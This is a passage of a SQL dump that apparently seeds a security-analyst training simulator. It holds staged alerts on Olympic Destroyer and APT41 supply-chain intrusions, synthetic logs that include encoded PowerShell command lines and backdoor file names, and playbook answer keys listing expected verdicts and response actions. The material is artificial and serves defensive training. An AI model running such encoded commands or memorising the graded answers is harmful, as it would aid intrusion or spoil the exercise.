2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(528, 'Lateral Movement: Spreading Through Critical Systems', 'high', 'Internal Network Monitoring', 'The threat actor is engaging in lateral movement within the network, targeting critical systems essential for the ceremony\'s operation. The objective is to identify and disrupt key systems, potentially using malware associated with known destructive campaigns.', 'Lateral Movement', 'T1550: Use Alternate Authentication Material', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.10.25\",\"dst_ip\":\"192.168.1.100\",\"src_port\":445,\"dst_port\":135,\"protocol\":\"SMB\",\"username\":\"ceremony_admin\",\"file_accessed\":\"Olympic_Destroyer.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"external_malicious_ip\":\"203.0.113.45\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Olympic_Destroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with Olympic Destroyer campaign.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer malware.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(529, 'Data Exfiltration: Sensitive Information Targeted', 'high', 'Data Loss Prevention (DLP)', 'In a final move, data is exfiltrated, possibly containing sensitive information that can be leveraged in future operations or sold on the black market. The threat actor utilized a compromised internal server to transmit sensitive documents to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:08Z\",\"internal_source_ip\":\"192.168.45.22\",\"external_destination_ip\":\"203.0.113.57\",\"user\":\"jdoe\",\"exfiltrated_files\":[\"confidential_report.pdf\",\"financial_summary.xlsx\"],\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"protocol\":\"HTTPS\",\"destination_port\":443,\"alert_id\":\"DLP-EXFIL-20231015-001\",\"detected_by\":\"Company DLP System\",\"associated_campaign\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration attempts by Sandworm APT\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal server used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with Sandworm campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention Logs\",\"verdict\":\"suspicious\",\"details\":\"File flagged during exfiltration attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(530, 'Initial Access: ASUS Update Utility Compromised', 'critical', 'Network Traffic Analysis', 'APT41 has compromised the ASUS Live Update utility, enabling malware distribution via a supply chain attack. This can potentially allow the threat actor to infiltrate systems that use the ASUS update service.', 'Supply Chain Attack', 'T1195.002', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-25T14:23:05Z\",\"event_type\":\"network_connection\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"ASUSUpdate.exe\",\"file_hash\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"user\":\"jsmith\",\"action\":\"connection_attempt\",\"status\":\"success\",\"direction\":\"outbound\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Source IP is from an internal network range.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feeds\",\"verdict\":\"malicious\",\"details\":\"Destination IP is associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash corresponds to a known variant of malware used in ASUS supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"vendor_security_advisory\",\"verdict\":\"suspicious\",\"details\":\"File name is associated with the compromised ASUS update utility.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(531, 'Execution: Malicious Payload Deployment', 'high', 'Endpoint Detection and Response', 'The infected update utility executes the malicious payload on target machines, setting the stage for further exploitation.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-05T14:22:39Z\",\"event_id\":\"E123456\",\"source_ip\":\"203.0.113.15\",\"internal_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"process_name\":\"update.exe\",\"file_path\":\"C:\\\\Program Files\\\\Update\\\\update.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"execute\",\"description\":\"Malicious payload executed by compromised update utility.\",\"os\":\"Windows 10\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with malware used in APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"User account of the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(532, 'Persistence: Establishing Backdoor Access', 'high', 'System Logs', 'APT41 has successfully installed a backdoor on the targeted system to ensure continued access. The backdoor was detected through analysis of system logs, indicating a connection to a known malicious IP and the presence of a suspicious executable file in the system.', 'Backdoor Installation', 'T1078 - Valid Accounts', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-11T15:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Execution\",\"status\":\"Failed Logon\",\"logon_type\":\"3\",\"authentication_package\":\"NTLM\",\"network_address\":\"10.0.0.55\",\"logon_guid\":\"{12345678-1234-5678-1234-567812345678}\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 associated IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Account used in multiple logon attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(533, 'Lateral Movement: Expanding Network Footprint', 'high', 'User Behavior Analytics', 'Using stolen credentials, the attackers move laterally across the network to identify high-value targets. This step involves credential dumping to facilitate further infiltration into the network.', 'Credential Dumping', 'T1003', 1, 'new', 68, '{\"timestamp\":\"2023-10-15T14:48:00Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.15.23\",\"username\":\"jdoe\",\"process_name\":\"lsass.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_description\":\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\",\"host\":\"WIN-SERVER01\",\"detected_by\":\"User Behavior Analytics\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unusual access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 